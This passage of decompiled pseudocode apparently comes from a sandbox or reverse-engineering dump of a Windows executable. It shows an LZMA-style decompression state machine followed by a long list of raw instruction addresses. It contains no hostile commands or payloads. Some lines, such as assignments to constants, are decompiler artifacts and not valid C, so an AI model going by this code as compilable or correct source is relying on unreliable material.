												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                    0x00000000
                                                    0x00406ffe
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407023
                                                    0x0040702a
                                                    0x00407030
                                                    0x00407036
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407004
                                                    0x0040700a
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00407447
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040744d
                                                    0x00407447
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
